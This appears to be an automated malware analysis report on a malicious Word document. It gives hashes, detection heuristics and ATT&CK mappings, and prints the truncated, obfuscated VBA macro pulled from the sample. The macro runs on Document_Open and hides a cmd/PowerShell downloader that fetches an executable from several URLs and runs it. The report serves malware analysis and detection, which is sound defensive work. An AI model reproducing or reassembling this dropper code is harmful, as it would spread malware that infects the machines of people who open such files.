Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 66b535ac033f85dd…

MALICIOUS

Office (OLE)

75.0 KB Created: 2018-09-06 10:07:00 Authoring application: Microsoft Office Word First seen: 2018-10-07
MD5: 6fcb696920107990109f2a7146320d5f SHA-1: a5a7fdfe8b9182443dbc9d525f2ea04c4495f4fc SHA-256: 66b535ac033f85ddae58c6f06d2d4ea6668f5bf34a76599a1cbd79c9a88c2a38
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro that is automatically executed upon opening the document. This macro utilizes the Shell() function to execute a command, likely to download and run a secondary payload. The obfuscated strings within the script suggest an attempt to conceal the malicious activity, and the presence of the Document_Open macro indicates a direct execution attempt.

Heuristics 5

  • ClamAV: Doc.Malware.Generic-6691317-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6691317-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5397 bytes
SHA-256: 2cdc542ef7a60ed31f16b978fb014ab31d6c16eb1e7fd85d116809c2d43c5374
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "frjihcZVabZB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Shell Format(rvVfw) + YWbuFPuIONz + wTWvjojZwwTEo + zkjhcoasm + jjOckS + qjbut + YIdvtzbw + HnJFdqqpM, vbHide
End Sub



Attribute VB_Name = "YZZwJvBZ"
Function zkjhcoasm()

On _
Error _
Resume _
Next
Month "h" + "193794809"
   Month "C" + "382373325" + "jWKmAWnkLovUK" + "HCYlVVNTpzJ"
YOlRXtfwjkC = Chr(13 + 18 + 7 + 12 + 49) + "md /" + "V" + "/" + Chr(9 + 12 + 5 + 8 + 33) + Chr(4 + 5 + 2 + 4 + 19) + "s^" + "e^t" + " ^0"
Month "Nh" + "229110695" + "5892" + "183307552"
   Month "jjQjNdsYRB" + "CKvAOfSRFif"
   Month "7512" + "8232"
   Month "jaml" + "KX" + "kHfmpUCc" + "am"
   Month "J" + "8061" + "106" + "5775"
NwQfbb = "R^uH= " + "  ^ ^  " + " ^ ^  " + "^ " + "^" + "  ^   " + " ^}}" + "{^h" + Chr(13 + 18 + 7 + 12 + 49) + "^ta" + Chr(13 + 18 + 7 + 12 + 49) + "}"
Month "To" + "2183" + "2022" + "208383919"
   Month "Ra" + "fm"
   Month "cj" + "CDrdH" + "WdnO" + "8052"
   Month "ir" + "zBoASj" + "100742043" + "4670"
nDrNQUwRfz = "^" + ";^k^a" + "^e" + "r^b^;E" + "j" + "^J^" + "$ " + "me" + "^t^I^-"
Month "D" + "HjvnSTG"
   Month "524050229" + "7684"
   Month "556" + "mcDj"
jcEEGiQz = "^e^" + "kovn^I;" + ")^E^j" + "J$" + "^ "
Month "9001" + "24022473"
hNuVadAWKYw = ",^SAf$(" + "^el^iF^" + "dao^ln" + "^w^" + "o^D" + "^.j^W" + "r${" + "yr" + "t{)" + Chr(13 + 18 + 7 + 12 + 49) + "^"
zkjhcoasm = YOlRXtfwjkC + NwQfbb + nDrNQUwRfz + jcEEGiQz + hNuVadAWKYw
   Month "DqpGdqi" + "uk"
End Function
Function jjOckS()

On _
Error _
Resume _
Next
Month "bOYimDMjv" + "BfD" + "nvaQubENhAGF" + "BY"
   Month "3090" + "28218384"
   Month "AM" + "cUzjOV"
lSobWVsw = "u^i^$" + " " + "ni^" + " S^Af" + "$(^h" + Chr(13 + 18 + 7 + 12 + 49) + "a" + "ero^f;'" + "e^xe." + "'^+" + "^fG^i" + "$^+"
Month "Fzmqc" + "405051823" + "JlDw" + "NhYX"
   Month "Y" + "hS"
   Month "6367" + "329373959"
   Month "333981403" + "9437"
   Month "KHYrATZPT" + "9944"
vfDab = "'\" + "'^+" + Chr(13 + 18 + 7 + 12 + 49) + "i" + "lb^u^p:" + "vne$=" + "E^j^" + "J$^;" + "^'726' " + "^=^ ^f" + "^G^i^$^" + ";)'" + "@^"
Month "646" + "150470254" + "OZ" + "MmzOl"
   Month "98447993" + "5047"
iTDiOXXrGjj = "'(^ti" + "^l^p" + "S^" + "." + "'t1f" + Chr(13 + 18 + 7 + 12 + 49) + "^d" + "^h" + "^DR/gmi" + "/" + "m^o" + Chr(13 + 18 + 7 + 12 + 49) + "^." + "gninna^" + "l^" + "p-^y^a^"
Month "LjX" + "1363"
DbbjzHf = "dn" + "u" + "^" + "s//:" + "p^t^" + "th@7^s^"
Month "395704547" + "EdNbIDT"
   Month "135751151" + "307608612"
   Month "F" + "3768"
   Month "232012190" + "iMu" + "dO" + "jk"
sLlAKCIbU = "aMvnpG" + "/m^o" + Chr(13 + 18 + 7 + 12 + 49) + "^.ytr^e" + "p^orp-" + "^" + "tva" + "//^:^p" + "^tth^@x" + "a^0hl" + "x6L^8j"
Month "YUMwzR" + "199767186" + "394025302" + "4204"
   Month "5511" + "AjTiVBOSwYq" + "FnQVtD" + "480826412"
   Month "1800" + "Y"
   Month "426709181" + "jK"
ijaDwd = "/" + "mo" + Chr(13 + 18 + 7 + 12 + 49) + "." + "t^a" + "h" + Chr(13 + 18 + 7 + 12 + 49) + "^" + "eti^l^a" + "k//:" + "p^t" + "^th^@^l" + "V^Yn" + "S8^h^" + "Y"
Month "twBmiJ" + "TNTClZPjTVhDNz" + "lvpHjNp" + "1988"
   Month "koN" + "460793219"
   Month "8645" + "pn"
ujabcw = "YB/" + "ur^" + ".yt^i" + Chr(13 + 18 + 7 + 12 + 49) + "^x^a" + "//^" + ":^p" + "t" + "^t^h^@" + "n^A^3" + "^u^F" + "1^xf^P/"
Month "SraP" + "KuHO"
   Month "1580" + "LMOI"
QDGUqCmXhEX = "orp" + ".s^tr^a" + "ve" + "^d.^ai" + "d^" + "e^mkra" + "d//^" + ":p^t^t" + "^h" + "^'=" + Chr(13 + 18 + 7 + 12 + 49) + "u^i" + "$;^t" + "ne" + "i^l" + Chr(9 + 12 + 5 + 8 + 33) + "be^"
jjOckS = lSobWVsw + vfDab + iTDiOXXrGjj + DbbjzHf + sLlAKCIbU + ijaDwd + ujabcw + QDGUqCmXhEX
   Month "bOMzNkKIJ" + "vX" + "476190279" + "T"
   Month "WH" + "Fwad" + "168944056" + "8704"
   Month "RkZj" + "275821402" + "FpNtWoSlW" + "HQzFS"
   Month "aJVS"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.